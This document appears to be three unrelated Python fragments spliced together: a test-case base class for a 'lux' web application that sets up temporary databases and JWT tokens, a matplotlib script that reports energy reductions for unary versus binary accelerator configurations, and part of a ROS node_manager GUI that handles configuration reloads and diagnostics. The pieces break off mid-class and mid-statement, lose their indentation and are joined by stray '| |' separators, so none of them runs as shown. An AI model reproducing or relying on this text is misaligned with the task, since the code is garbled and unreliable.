        cls.app = cls.create_test_application()
        cls.client = cls.get_client()
        if hasattr(cls.app, 'odm'):
            # Store the original odm for removing the new databases
            cls.odm = cls.app.odm
            await cls.setupdb()
        # admin JWT token for admin operations on Token auth backends
        cls.admin_jwt = await as_coroutine(cls.create_admin_jwt())
        await cls.populatedb()
        await cls.beforeAll()

    @classmethod
    async def tearDownClass(cls):
        # Only drop databases if setUpClass actually created them.
        if cls.odm:
            await cls.dropdb()
        await cls.afterAll()

    @classmethod
    def get_client(cls):
        # Client bound to the class application.
        return AppClient.create(cls.app, False)

    @classmethod
    def create_test_application(cls):
        """Return the lux application"""
        return test_app(cls)

    @classmethod
    def create_admin_jwt(cls):
        """Return the admin JWT for the application"""
        return app_token(cls.app)

    @classmethod
    def dbname(cls, engine):
        # Random, prefixed database name per engine, memoised in cls.dbs.
        if engine not in cls.dbs:
            cls.dbs[engine] = randomname(cls.prefixdb)
        return cls.dbs[engine]

    @classmethod
    @green
    def setupdb(cls):
        # NOTE(review): ``database=cls.dbname`` passes the bound
        # classmethod itself -- presumably database_create calls it per
        # engine to obtain a name; confirm against the odm API.
        cls.app.odm = cls.odm.database_create(database=cls.dbname)
        odm = cls.app.odm()
        DATASTORE = cls.app.config['DATASTORE']
        if not isinstance(DATASTORE, dict):
            DATASTORE = {'default': DATASTORE}
        #
        # Replace datastores with temporary ones for this test class
        cls.datastore = {}
        for original_engine, database in cls.dbs.items():
            orig_url = str(original_engine.url)
            for engine in odm.engines():
                if engine.url.database == database:
                    new_url = str(engine.url)
                    for key, url in DATASTORE.items():
                        if url == orig_url:
                            cls.datastore[key] = new_url
        cls.app.config['DATASTORE'] = cls.datastore
        cls.app.params['DATASTORE'] = cls.datastore
        cls.table_create()

    @classmethod
    def table_create(cls):
        # Create all tables in the temporary databases.
        cls.app.odm().table_create()

    @classmethod
    @green
    def dropdb(cls):
        # Close the test odm, then drop the temporary databases via the
        # original odm handler.
        cls.app.odm().close()
        cls.odm().database_drop(database=cls.dbname)

    @classmethod
    async def populatedb(cls):
        # Load fixtures (if any) through the API using the admin token.
        return load_fixtures(cls.app,
                             path=cls.fixtures_path,
                             api_url=cls.api_url(),
                             admin_jwt=cls.admin_jwt)

    @classmethod
    def api_url(cls, path=None):
        # Returns None when the app has no API_URL configured.
        if 'API_URL' in cls.app.config:
            url = cls.app.config['API_URL']
            return remove_double_slash('%s/%s' % (url, path)) if path else url

    @classmethod
    def clone_app(cls):
        # Deep-copy the application via pickle so the clone can be
        # mutated independently; re-point it at the test datastores.
        sapp = pickle.dumps(cls.app.callable)
        app = pickle.loads(sapp).setup(handler=False)
        if cls.datastore:
            app.config['DATASTORE'] = cls.datastore
        return TestApp(app)

    @classmethod
    async def beforeAll(cls):
        """Can be used to add logic before all tests"""

    @classmethod
    async def afterAll(cls):
        """Can be used to add logic after all tests"""

    @classmethod
    async def user_token(cls, credentials, **kw):
        '''Return a token for a user
        '''
        if isinstance(credentials, str):
            # NOTE(review): '<PASSWORD>' looks like a redacted literal
            # from a sanitisation pass -- restore the original value.
            credentials = {"username": credentials,
                           "password": <PASSWORD>}
        # Get new token
        response = await cls.client.post(cls.api_url('authorizations'),
                                         json=credentials, **kw)
        test = cls._test
        data = test.json(response, 201)
        test.assertTrue('id' in data)
        test.assertTrue('expiry' in data)
        test.assertTrue(data['session'])
        # The request itself is made anonymously; only the returned
        # token identifies the user.
        user = response.wsgi_request.cache.user
        test.assertTrue(user.is_anonymous())
        return data['id']

    def create_superuser(self, username, email, password):
        """A shortcut for the create_superuser command
        """
        return self.client.run_command('create_superuser',
                                       ['--username', username,
                                        '--email', email,
                                        '--password', password])
class WebApiTestCase(AppTestCase):
"""Test case for an api-web application pair
"""
web_config_file = None
web_config_params | |
- total_energy_list_bs_spm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ur - 32c
# Each configuration occupies 5 consecutive rows of energy_list:
#   dram data, sram data, sram leakage, systolic-array data,
#   systolic-array leakage.
# NOTE(review): the [-1:] slices keep only the last entry of each row,
# so the per-i loops below assume len(x_axis) == 1 -- confirm upstream.
index = 2
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_u6_wspm = []
onchip_energy_list_u6_wspm = []
for i in range(len(x_axis)):
    # total = off-chip (dram) + all on-chip components
    total_energy_list_u6_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
    onchip_energy_list_u6_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_u6_wspm, width, hatch = None, alpha=0.99, color=u6_color, label='Unary-32c')
# Reductions relative to the binary-parallel baseline (1 - ratio).
onchip_energy_r_list_u6_wspm = []
for i in range(len(x_axis)):
    onchip_energy_r_list_u6_wspm.append(1-onchip_energy_list_u6_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_u6_wspm = []
for i in range(len(x_axis)):
    total_energy_r_list_u6_wspm.append(1 - total_energy_list_u6_wspm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ur - 64c
# Same breakdown for the unary 64-cycle configuration.
index = 3
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_u7_wspm = []
onchip_energy_list_u7_wspm = []
for i in range(len(x_axis)):
    total_energy_list_u7_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
    onchip_energy_list_u7_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_u7_wspm, width, hatch = None, alpha=0.99, color=u7_color, label='Unary-64c')
onchip_energy_r_list_u7_wspm = []
for i in range(len(x_axis)):
    onchip_energy_r_list_u7_wspm.append(1-onchip_energy_list_u7_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_u7_wspm = []
for i in range(len(x_axis)):
    total_energy_r_list_u7_wspm.append(1 - total_energy_list_u7_wspm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ur - 128c
# Same breakdown for the unary 128-cycle configuration.
index = 4
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_u8_wspm = []
onchip_energy_list_u8_wspm = []
for i in range(len(x_axis)):
    total_energy_list_u8_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
    onchip_energy_list_u8_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_u8_wspm, width, hatch = None, alpha=0.99, color=u8_color, label='Unary-128c')
onchip_energy_r_list_u8_wspm = []
for i in range(len(x_axis)):
    onchip_energy_r_list_u8_wspm.append(1-onchip_energy_list_u8_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_u8_wspm = []
for i in range(len(x_axis)):
    total_energy_r_list_u8_wspm.append(1 - total_energy_list_u8_wspm[i]/total_energy_list_bp_spm[i])
# 8b - wospm - ug - 256c
# Same breakdown for the uGEMM 256-cycle configuration.
index = 5
dram_d_list = energy_list[index * 5 + 0][-1:]
sram_d_list = energy_list[index * 5 + 1][-1:]
sram_l_list = energy_list[index * 5 + 2][-1:]
sarr_d_list = energy_list[index * 5 + 3][-1:]
sarr_l_list = energy_list[index * 5 + 4][-1:]
total_energy_list_ug_wspm = []
onchip_energy_list_ug_wspm = []
for i in range(len(x_axis)):
    total_energy_list_ug_wspm.append(dram_d_list[i] + sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
    onchip_energy_list_ug_wspm.append(sram_d_list[i] + sram_l_list[i] + sarr_d_list[i] + sarr_l_list[i])
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), total_energy_list_ug_wspm, width, hatch = None, alpha=0.99, color=ug_color, label='uGEMM-H')
onchip_energy_r_list_ug_wspm = []
for i in range(len(x_axis)):
    onchip_energy_r_list_ug_wspm.append(1-onchip_energy_list_ug_wspm[i]/onchip_energy_list_bp_spm[i])
total_energy_r_list_ug_wspm = []
for i in range(len(x_axis)):
    total_energy_r_list_ug_wspm.append(1 - total_energy_list_ug_wspm[i]/total_energy_list_bp_spm[i])
# Axis formatting: log-scale energy axis, shaded column bands, and
# scientific-notation tick labels; then save the figure per benchmark.
ax.set_ylabel('Total energy\n(uJ)')
ax.set_xticks(x_idx)
ax.set_xticklabels(x_axis)
plt.xlim(x_idx[0]-0.5, x_idx[-1]+0.5)
plt.yscale("log")
_, top = plt.ylim()
locs, labels = plt.yticks()
# NOTE(review): both branches drop the first tick identically -- the
# per-benchmark special case appears to have been removed; simplify?
if a == "eyeriss":
    locs = locs[1:]
else:
    locs = locs[1:]
ax.set_yticks(locs)
bottom, _ = plt.ylim()
# NOTE(review): both branches below are also identical.
if a == "eyeriss":
    ax.set_ylim((bottom, top))
    bottom, top = plt.ylim()
    # alternate shaded background bands behind every other group
    for x in x_idx:
        ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
else:
    ax.set_ylim((bottom, top))
    bottom, top = plt.ylim()
    for x in x_idx:
        ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
# Render tick labels in 1-digit scientific notation ("1E+03" style).
y_label_list = []
for y in locs:
    if y != 0:
        y_label_list.append("{:1.0E}".format(abs(y)))
    else:
        y_label_list.append("0")
ax.set_yticklabels(y_label_list)
ax.minorticks_off()
fig.tight_layout()
plt.savefig('./outputs_fig/' + technode + '/Energy_total_' + a_cap + ".pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
# Report on-chip energy reductions, first against the binary-parallel
# baseline, then against the binary-serial baseline.
if print_energy_onchip:
    print("On-chip energy reduction: ")
    print("binary parallel (baseline):", onchip_energy_list_bp_spm)
    print("binary serial             :", onchip_energy_r_list_bs_spm)
    print("unary 32c                 :", onchip_energy_r_list_u6_wspm)
    print("unary 64c                 :", onchip_energy_r_list_u7_wspm)
    print("unary 128c                :", onchip_energy_r_list_u8_wspm)
    print("ugemm 256c                :", onchip_energy_r_list_ug_wspm)
    # Summary statistics pool all three unary configurations together
    # (uGEMM is reported but excluded from the aggregate).
    print("min reduction:", min(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
    print("mean reduction:", mean(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
    print("median reduction:", median(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
    print("max reduction:", max(onchip_energy_r_list_u6_wspm + onchip_energy_r_list_u7_wspm + onchip_energy_r_list_u8_wspm)*100, "%")
    # Reductions relative to the binary-serial configuration.
    onchip_energy_bs_r_list_u6_wspm = []
    onchip_energy_bs_r_list_u7_wspm = []
    onchip_energy_bs_r_list_u8_wspm = []
    onchip_energy_bs_r_list_ug_wspm = []
    for i in range(len(onchip_energy_list_bs_spm)):
        onchip_energy_bs_r_list_u6_wspm.append(1 - onchip_energy_list_u6_wspm[i] / onchip_energy_list_bs_spm[i])
        onchip_energy_bs_r_list_u7_wspm.append(1 - onchip_energy_list_u7_wspm[i] / onchip_energy_list_bs_spm[i])
        onchip_energy_bs_r_list_u8_wspm.append(1 - onchip_energy_list_u8_wspm[i] / onchip_energy_list_bs_spm[i])
        onchip_energy_bs_r_list_ug_wspm.append(1 - onchip_energy_list_ug_wspm[i] / onchip_energy_list_bs_spm[i])
    print("binary serial (baseline)  :", onchip_energy_list_bs_spm)
    print("unary 32c                 :", onchip_energy_bs_r_list_u6_wspm)
    print("unary 64c                 :", onchip_energy_bs_r_list_u7_wspm)
    print("unary 128c                :", onchip_energy_bs_r_list_u8_wspm)
    print("ugemm 256c                :", onchip_energy_bs_r_list_ug_wspm)
    print("min reduction:", min(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
    print("mean reduction:", mean(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
    print("median reduction:", median(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
    print("max reduction:", max(onchip_energy_bs_r_list_u6_wspm + onchip_energy_bs_r_list_u7_wspm + onchip_energy_bs_r_list_u8_wspm)*100, "%")
# Report total (on-chip + dram) energy reductions against the
# binary-parallel and binary-serial baselines; mirrors the on-chip
# reporting block above.
if print_energy_total:
    print("Total energy reduction: ")
    print("binary parallel (baseline):", total_energy_list_bp_spm)
    print("binary serial             :", total_energy_r_list_bs_spm)
    print("unary 32c                 :", total_energy_r_list_u6_wspm)
    print("unary 64c                 :", total_energy_r_list_u7_wspm)
    print("unary 128c                :", total_energy_r_list_u8_wspm)
    print("ugemm 256c                :", total_energy_r_list_ug_wspm)
    print("min reduction:", min(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
    print("mean reduction:", mean(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
    print("median reduction:", median(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
    print("max reduction:", max(total_energy_r_list_u6_wspm + total_energy_r_list_u7_wspm + total_energy_r_list_u8_wspm)*100, "%")
    # Reductions relative to the binary-serial configuration.
    total_energy_bs_r_list_u6_wspm = []
    total_energy_bs_r_list_u7_wspm = []
    total_energy_bs_r_list_u8_wspm = []
    total_energy_bs_r_list_ug_wspm = []
    for i in range(len(total_energy_list_bs_spm)):
        total_energy_bs_r_list_u6_wspm.append(1 - total_energy_list_u6_wspm[i] / total_energy_list_bs_spm[i])
        total_energy_bs_r_list_u7_wspm.append(1 - total_energy_list_u7_wspm[i] / total_energy_list_bs_spm[i])
        total_energy_bs_r_list_u8_wspm.append(1 - total_energy_list_u8_wspm[i] / total_energy_list_bs_spm[i])
        total_energy_bs_r_list_ug_wspm.append(1 - total_energy_list_ug_wspm[i] / total_energy_list_bs_spm[i])
    print("binary serial (baseline)  :", total_energy_list_bs_spm)
    print("unary 32c                 :", total_energy_bs_r_list_u6_wspm)
    print("unary 64c                 :", total_energy_bs_r_list_u7_wspm)
    print("unary 128c                :", total_energy_bs_r_list_u8_wspm)
    print("ugemm 256c                :", total_energy_bs_r_list_ug_wspm)
    print("min reduction:", min(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
    print("mean reduction:", mean(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
    print("median reduction:", median(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
    print("max reduction:", max(total_energy_bs_r_list_u6_wspm + total_energy_bs_r_list_u7_wspm + total_energy_bs_r_list_u8_wspm)*100, "%")
# energy eff
# Energy efficiency = throughput / energy, computed per configuration
# for both on-chip-only and total energy.
onchip_energy_eff_list_bp_spm = []
onchip_energy_eff_list_bs_spm = []
onchip_energy_eff_list_u6_wspm = []
onchip_energy_eff_list_u7_wspm = []
onchip_energy_eff_list_u8_wspm = []
onchip_energy_eff_list_ug_wspm = []
total_energy_eff_list_bp_spm = []
total_energy_eff_list_bs_spm = []
total_energy_eff_list_u6_wspm = []
total_energy_eff_list_u7_wspm = []
total_energy_eff_list_u8_wspm = []
total_energy_eff_list_ug_wspm = []
for i in range(len(throughput_list_bp_spm)):
    onchip_energy_eff_list_bp_spm.append(throughput_list_bp_spm[i] / onchip_energy_list_bp_spm[i])
    onchip_energy_eff_list_bs_spm.append(throughput_list_bs_spm[i] / onchip_energy_list_bs_spm[i])
    onchip_energy_eff_list_u6_wspm.append(throughput_list_u6_wspm[i] / onchip_energy_list_u6_wspm[i])
    onchip_energy_eff_list_u7_wspm.append(throughput_list_u7_wspm[i] / onchip_energy_list_u7_wspm[i])
    onchip_energy_eff_list_u8_wspm.append(throughput_list_u8_wspm[i] / onchip_energy_list_u8_wspm[i])
    onchip_energy_eff_list_ug_wspm.append(throughput_list_ug_wspm[i] / onchip_energy_list_ug_wspm[i])
    total_energy_eff_list_bp_spm.append(throughput_list_bp_spm[i] / total_energy_list_bp_spm[i])
    total_energy_eff_list_bs_spm.append(throughput_list_bs_spm[i] / total_energy_list_bs_spm[i])
    total_energy_eff_list_u6_wspm.append(throughput_list_u6_wspm[i] / total_energy_list_u6_wspm[i])
    total_energy_eff_list_u7_wspm.append(throughput_list_u7_wspm[i] / total_energy_list_u7_wspm[i])
    total_energy_eff_list_u8_wspm.append(throughput_list_u8_wspm[i] / total_energy_list_u8_wspm[i])
    total_energy_eff_list_ug_wspm.append(throughput_list_ug_wspm[i] / total_energy_list_ug_wspm[i])
# Relative efficiency improvements (ratio - 1) against three baselines:
# binary parallel (bp), binary serial (bs) and uGEMM (ug).
onchip_energy_eff_bp_r_list_bs_spm = []
onchip_energy_eff_bp_r_list_u6_wspm = []
onchip_energy_eff_bp_r_list_u7_wspm = []
onchip_energy_eff_bp_r_list_u8_wspm = []
onchip_energy_eff_bp_r_list_ug_wspm = []
total_energy_eff_bp_r_list_bs_spm = []
total_energy_eff_bp_r_list_u6_wspm = []
total_energy_eff_bp_r_list_u7_wspm = []
total_energy_eff_bp_r_list_u8_wspm = []
total_energy_eff_bp_r_list_ug_wspm = []
onchip_energy_eff_bs_r_list_u6_wspm = []
onchip_energy_eff_bs_r_list_u7_wspm = []
onchip_energy_eff_bs_r_list_u8_wspm = []
onchip_energy_eff_bs_r_list_ug_wspm = []
total_energy_eff_bs_r_list_u6_wspm = []
total_energy_eff_bs_r_list_u7_wspm = []
total_energy_eff_bs_r_list_u8_wspm = []
total_energy_eff_bs_r_list_ug_wspm = []
onchip_energy_eff_ug_r_list_u6_wspm = []
onchip_energy_eff_ug_r_list_u7_wspm = []
onchip_energy_eff_ug_r_list_u8_wspm = []
total_energy_eff_ug_r_list_u6_wspm = []
total_energy_eff_ug_r_list_u7_wspm = []
total_energy_eff_ug_r_list_u8_wspm = []
for i in range(len(throughput_list_bp_spm)):
    onchip_energy_eff_bp_r_list_bs_spm.append(onchip_energy_eff_list_bs_spm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
    onchip_energy_eff_bp_r_list_u6_wspm.append(onchip_energy_eff_list_u6_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
    onchip_energy_eff_bp_r_list_u7_wspm.append(onchip_energy_eff_list_u7_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
    onchip_energy_eff_bp_r_list_u8_wspm.append(onchip_energy_eff_list_u8_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
    onchip_energy_eff_bp_r_list_ug_wspm.append(onchip_energy_eff_list_ug_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
    total_energy_eff_bp_r_list_bs_spm.append(total_energy_eff_list_bs_spm[i] / total_energy_eff_list_bp_spm[i] - 1)
    total_energy_eff_bp_r_list_u6_wspm.append(total_energy_eff_list_u6_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
    total_energy_eff_bp_r_list_u7_wspm.append(total_energy_eff_list_u7_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
    total_energy_eff_bp_r_list_u8_wspm.append(total_energy_eff_list_u8_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
    total_energy_eff_bp_r_list_ug_wspm.append(total_energy_eff_list_ug_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
    onchip_energy_eff_bs_r_list_u6_wspm.append(onchip_energy_eff_list_u6_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
    onchip_energy_eff_bs_r_list_u7_wspm.append(onchip_energy_eff_list_u7_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
    onchip_energy_eff_bs_r_list_u8_wspm.append(onchip_energy_eff_list_u8_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
    onchip_energy_eff_bs_r_list_ug_wspm.append(onchip_energy_eff_list_ug_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
    total_energy_eff_bs_r_list_u6_wspm.append(total_energy_eff_list_u6_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
    total_energy_eff_bs_r_list_u7_wspm.append(total_energy_eff_list_u7_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
    total_energy_eff_bs_r_list_u8_wspm.append(total_energy_eff_list_u8_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
    total_energy_eff_bs_r_list_ug_wspm.append(total_energy_eff_list_ug_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
    onchip_energy_eff_ug_r_list_u6_wspm.append(onchip_energy_eff_list_u6_wspm[i] / onchip_energy_eff_list_ug_wspm[i] - 1)
    onchip_energy_eff_ug_r_list_u7_wspm.append(onchip_energy_eff_list_u7_wspm[i] / onchip_energy_eff_list_ug_wspm[i] - 1)
    onchip_energy_eff_ug_r_list_u8_wspm.append(onchip_energy_eff_list_u8_wspm[i] / onchip_energy_eff_list_ug_wspm[i] - 1)
    total_energy_eff_ug_r_list_u6_wspm.append(total_energy_eff_list_u6_wspm[i] / total_energy_eff_list_ug_wspm[i] - 1)
    total_energy_eff_ug_r_list_u7_wspm.append(total_energy_eff_list_u7_wspm[i] / total_energy_eff_list_ug_wspm[i] - 1)
    total_energy_eff_ug_r_list_u8_wspm.append(total_energy_eff_list_u8_wspm[i] / total_energy_eff_list_ug_wspm[i] - 1)
# Report on-chip energy-efficiency improvements; the unary summary
# statistics pool the 32/64/128-cycle configurations together.
if print_energy_eff:
    print("On-chip energy efficiency improve: ")
    onchip_energy_eff_bp_r_list_ux_wspm_min = min(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
    onchip_energy_eff_bp_r_list_ux_wspm_mean = mean(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
    onchip_energy_eff_bp_r_list_ux_wspm_median = median(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
    onchip_energy_eff_bp_r_list_ux_wspm_max = max(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
    # vs the binary-parallel baseline
    print("binary parallel (baseline):", onchip_energy_eff_list_bp_spm)
    print("binary serial             :", onchip_energy_eff_bp_r_list_bs_spm)
    print("unary 32c                 :", onchip_energy_eff_bp_r_list_u6_wspm)
    print("unary 64c                 :", onchip_energy_eff_bp_r_list_u7_wspm)
    print("unary 128c                :", onchip_energy_eff_bp_r_list_u8_wspm)
    print("ugemm 256c                :", onchip_energy_eff_bp_r_list_ug_wspm)
    print("min improve:", onchip_energy_eff_bp_r_list_ux_wspm_min*100, "%")
    print("mean improve:", onchip_energy_eff_bp_r_list_ux_wspm_mean*100, "%")
    print("median improve:", onchip_energy_eff_bp_r_list_ux_wspm_median*100, "%")
    print("max improve:", onchip_energy_eff_bp_r_list_ux_wspm_max*100, "%")
    # vs the binary-serial baseline
    onchip_energy_eff_bs_r_list_ux_wspm_min = min(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
    onchip_energy_eff_bs_r_list_ux_wspm_mean = mean(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
    onchip_energy_eff_bs_r_list_ux_wspm_median = median(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
    onchip_energy_eff_bs_r_list_ux_wspm_max = max(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
    print("binary serial (baseline)  :", onchip_energy_eff_list_bs_spm)
    print("unary 32c                 :", onchip_energy_eff_bs_r_list_u6_wspm)
    print("unary 64c                 :", onchip_energy_eff_bs_r_list_u7_wspm)
    print("unary 128c                :", onchip_energy_eff_bs_r_list_u8_wspm)
    print("ugemm 256c                :", onchip_energy_eff_bs_r_list_ug_wspm)
    print("min improve:", onchip_energy_eff_bs_r_list_ux_wspm_min*100, "%")
    print("mean improve:", onchip_energy_eff_bs_r_list_ux_wspm_mean*100, "%")
    print("median improve:", onchip_energy_eff_bs_r_list_ux_wspm_median*100, "%")
    print("max improve:", onchip_energy_eff_bs_r_list_ux_wspm_max*100, "%")
    # vs the uGEMM baseline
    onchip_energy_eff_ug_r_list_ux_wspm_min = min(onchip_energy_eff_ug_r_list_u6_wspm + onchip_energy_eff_ug_r_list_u7_wspm + onchip_energy_eff_ug_r_list_u8_wspm)
    onchip_energy_eff_ug_r_list_ux_wspm_mean = mean(onchip_energy_eff_ug_r_list_u6_wspm + onchip_energy_eff_ug_r_list_u7_wspm + onchip_energy_eff_ug_r_list_u8_wspm)
onchip_energy_eff_ug_r_list_ux_wspm_median | |
if ld.path in self._start_nodes_after_load_cfg:
self.start_nodes_by_name(self._start_nodes_after_load_cfg[ld.path], ld.path, True)
del self._start_nodes_after_load_cfg[ld.path]
removed_configs = set(self.__configs.keys()) - set(new_configs)
for cfg in removed_configs:
if isinstance(cfg, tuple):
rospy.logwarn("CFG: unsupported config type: %s" % str(cfg))
continue
if cfg.startswith(url):
print ("remove config", url, cfg)
self.remove_cfg_from_model(cfg)
del self.__configs[cfg]
else:
pass
self.updateButtons()
for cfg in new_configs:
if cfg in self._cfg_changed_nodes:
changed_nodes = self._cfg_changed_nodes[cfg]
del self._cfg_changed_nodes[cfg]
node_count = ''
if len(changed_nodes) > 1:
node_count = 's [%d]' % len(changed_nodes)
nodes_text = '<br>'
for chn in changed_nodes:
nodes_text += "%s " % HTMLDelegate.toHTML(chn)
self.message_frame.show_question(MessageFrame.TYPE_NODE_CFG, 'Configuration changed for node%s:%s<br>restart?' % (node_count, nodes_text), MessageData((changed_nodes, cfg)))
def on_nmd_version_retrieved(self, nmd_url, version, date):
    '''Store the daemon version reported for our master and refresh the
    diagnostic state. Reports for other masters are ignored.
    '''
    if nmdurl.equal_uri(nmdurl.masteruri(nmd_url), self.masteruri):
        self._diag_nmd_version = version
        self._check_diag_state_nmd()
def on_log_dir_retrieved(self, nmd_url, log_dir_size):
    '''Store the log-directory size reported for our master and refresh
    the diagnostic state. Reports for other masters are ignored.
    '''
    if nmdurl.equal_uri(nmdurl.masteruri(nmd_url), self.masteruri):
        self._diag_log_dir_size = log_dir_size
        self._check_diag_state_nmd()
def _check_diag_state_nmd(self):
    '''Evaluate the cached daemon state and raise or clear warnings.

    Warns when the remote daemon version differs from our own, or when
    its log directory exceeds 1 GiB; otherwise marks the daemon OK.
    '''
    state_ok = True
    if self._diag_nmd_version is not None:
        if self._diag_nmd_version != self._nmd_version:
            state_ok = False
            res = self.set_diagnostic_warn('/node_manager_daemon', "node_manager_daemon has on<br>%s different version<br>'%s', own:<br>'%s'.<br>Please update and restart!" % (self.masteruri, self._diag_nmd_version, self._nmd_version))
            # Fall back to an interactive question when diagnostics
            # support is not available.
            if not res:
                self.message_frame.show_question(MessageFrame.TYPE_NMD, "node_manager_daemon has on %s different version '%s', own '%s'.\nShould it be started?" % (self.masteruri, self._diag_nmd_version, self._nmd_version), MessageData(self.masteruri))
    if self._diag_log_dir_size is not None:
        # 1073741824 bytes == 1 GiB threshold for the log directory.
        if self._diag_log_dir_size > 1073741824:
            state_ok = False
            hostname = get_hostname(self.masteruri)
            # Offer a clickable `rosclean purge` link in the warning.
            clean_cmd = '<a href="rosclean://%s" title="calls `rosclean purge` at `%s`">rosclean purge</a>' % (self.masteruri.replace('http://', ''), hostname)
            res = self.set_diagnostic_warn('/node_manager_daemon', "disk usage in log directory @%s is %s. %s" % (get_hostname(self.masteruri), sizeof_fmt(self._diag_log_dir_size), clean_cmd))
    if state_ok:
        self.set_diagnostic_ok('/node_manager_daemon')
def set_diagnostic_warn(self, node_name, msg):
    '''Publish a WARN diagnostic status for ``node_name``.

    :return: True when diagnostics support is available, else False
    '''
    if not DIAGNOSTICS_AVAILABLE:
        return False
    status = DiagnosticStatus()
    status.name = node_name
    status.level = DiagnosticStatus.WARN
    status.message = msg
    self.append_diagnostic(status)
    return True
def set_diagnostic_ok(self, node_name):
    '''Publish an OK diagnostic status for ``node_name``.

